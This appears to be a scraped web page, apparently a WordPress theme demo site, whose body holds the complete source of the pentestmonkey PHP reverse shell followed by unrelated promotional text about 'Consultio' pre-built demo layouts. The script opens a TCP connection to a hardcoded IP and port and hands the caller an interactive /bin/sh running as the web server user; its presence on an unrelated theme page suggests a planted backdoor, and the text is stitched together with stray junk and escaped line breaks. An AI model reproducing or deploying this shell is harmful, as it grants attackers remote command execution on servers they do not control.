GSDAGSDAGSDA

RC

<?php\r\n// php-reverse-shell – A Reverse Shell implementation in PHP\r\n// Copyright (C) 2007 pentestmonkey@pentestmonkey.net\r\n//\r\n// This tool may be used for legal purposes only. Users take full responsibility\r\n// for any actions performed using this tool. The author accepts no liability\r\n// for damage caused by this tool. If these terms are not acceptable to you, then\r\n// do not use this tool.\r\n//\r\n// In all other respects the GPL version 2 applies:\r\n//\r\n// This program is free software; you can redistribute it and/or modify\r\n// it under the terms of the GNU General Public License version 2 as\r\n// published by the Free Software Foundation.\r\n//\r\n// This program is distributed in the hope that it will be useful,\r\n// but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n// GNU General Public License for more details.\r\n//\r\n// You should have received a copy of the GNU General Public License along\r\n// with this program; if not, write to the Free Software Foundation, Inc.,\r\n// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.\r\n//\r\n// This tool may be used for legal purposes only. Users take full responsibility\r\n// for any actions performed using this tool. If these terms are not acceptable to\r\n// you, then do not use this tool.\r\n//\r\n// You are encouraged to send comments, improvements or suggestions to\r\n// me at pentestmonkey@pentestmonkey.net\r\n//\r\n// Description\r\n// ———–\r\n// This script will make an outbound TCP connection to a hardcoded IP and port.\r\n// The recipient will be given a shell running as the current user (apache normally).\r\n//\r\n// Limitations\r\n// ———–\r\n// proc_open and stream_set_blocking require PHP version 4.3+, or 5+\r\n// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.\r\n// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.\r\n//\r\n// Usage\r\n// —–\r\n// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.\r\n\r\nset_time_limit (0);\r\n$VERSION = “1.0”;\r\n$ip = ‘192.168.1.9’; // CHANGE THIS\r\n$port = 1234; // CHANGE THIS\r\n$chunk_size = 1400;\r\n$write_a = null;\r\n$error_a = null;\r\n$shell = ‘uname -a; w; id; /bin/sh -i’;\r\n$daemon = 0;\r\n$debug = 0;\r\n\r\n//\r\n// Daemonise ourself if possible to avoid zombies later\r\n//\r\n\r\n// pcntl_fork is hardly ever available, but will allow us to daemonise\r\n// our php process and avoid zombies. Worth a try…\r\nif (function_exists(‘pcntl_fork’)) {\r\n// Fork and have the parent process exit\r\n$pid = pcntl_fork();\r\n\r\nif ($pid == -1) {\r\nprintit(“ERROR: Can’t fork”);\r\nexit(1);\r\n}\r\n\r\nif ($pid) {\r\nexit(0); // Parent exits\r\n}\r\n\r\n// Make the current process a session leader\r\n// Will only succeed if we forked\r\nif (posix_setsid() == -1) {\r\nprintit(“Error: Can’t setsid()”);\r\nexit(1);\r\n}\r\n\r\n$daemon = 1;\r\n} else {\r\nprintit(“WARNING: Failed to daemonise. This is quite common and not fatal.”);\r\n}\r\n\r\n// Change to a safe directory\r\nchdir(“/”);\r\n\r\n// Remove any umask we inherited\r\numask(0);\r\n\r\n//\r\n// Do the reverse shell…\r\n//\r\n\r\n// Open reverse connection\r\n$sock = fsockopen($ip, $port, $errno, $errstr, 30);\r\nif (!$sock) {\r\nprintit(“$errstr ($errno)”);\r\nexit(1);\r\n}\r\n\r\n// Spawn shell process\r\n$descriptorspec = array(\r\n0 => array(“pipe”, “r”), // stdin is a pipe that the child will read from\r\n1 => array(“pipe”, “w”), // stdout is a pipe that the child will write to\r\n2 => array(“pipe”, “w”) // stderr is a pipe that the child will write to\r\n);\r\n\r\n$process = proc_open($shell, $descriptorspec, $pipes);\r\n\r\nif (!is_resource($process)) {\r\nprintit(“ERROR: Can’t spawn shell”);\r\nexit(1);\r\n}\r\n\r\n// Set everything to non-blocking\r\n// Reason: Occsionally reads will block, even though stream_select tells us they won’t\r\nstream_set_blocking($pipes[0], 0);\r\nstream_set_blocking($pipes[1], 0);\r\nstream_set_blocking($pipes[2], 0);\r\nstream_set_blocking($sock, 0);\r\n\r\nprintit(“Successfully opened reverse shell to $ip:$port”);\r\n\r\nwhile (1) {\r\n// Check for end of TCP connection\r\nif (feof($sock)) {\r\nprintit(“ERROR: Shell connection terminated”);\r\nbreak;\r\n}\r\n\r\n// Check for end of STDOUT\r\nif (feof($pipes[1])) {\r\nprintit(“ERROR: Shell process terminated”);\r\nbreak;\r\n}\r\n\r\n// Wait until a command is end down $sock, or some\r\n// command output is available on STDOUT or STDERR\r\n$read_a = array($sock, $pipes[1], $pipes[2]);\r\n$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\r\n\r\n// If we can read from the TCP socket, send\r\n// data to process’s STDIN\r\nif (in_array($sock, $read_a)) {\r\nif ($debug) printit(“SOCK READ”);\r\n$input = fread($sock, $chunk_size);\r\nif ($debug) printit(“SOCK: $input”);\r\nfwrite($pipes[0], $input);\r\n}\r\n\r\n// If we can read from the process’s STDOUT\r\n// send data down tcp connection\r\nif (in_array($pipes[1], $read_a)) {\r\nif ($debug) printit(“STDOUT READ”);\r\n$input = fread($pipes[1], $chunk_size);\r\nif ($debug) printit(“STDOUT: $input”);\r\nfwrite($sock, $input);\r\n}\r\n\r\n// If we can read from the process’s STDERR\r\n// send data down tcp connection\r\nif (in_array($pipes[2], $read_a)) {\r\nif ($debug) printit(“STDERR READ”);\r\n$input = fread($pipes[2], $chunk_size);\r\nif ($debug) printit(“STDERR: $input”);\r\nfwrite($sock, $input);\r\n}\r\n}\r\n\r\nfclose($sock);\r\nfclose($pipes[0]);\r\nfclose($pipes[1]);\r\nfclose($pipes[2]);\r\nproc_close($process);\r\n\r\n// Like print, but does nothing if we’ve daemonised ourself\r\n// (I can’t figure out how to redirect STDOUT like a proper daemon)\r\nfunction printit ($string) {\r\nif (!$daemon) {\r\nprint “$string\n”;\r\n}\r\n}\r\n\r\n?>\r\n\r\n \r\n\r\n \r\n

Choose Demos Submit a Ticket Purchase Theme

Pre-Built Demos Collection

Consultio comes with a beautiful collection of modern, easily importable, and highly customizable demo layouts. Any of which can be installed via one click.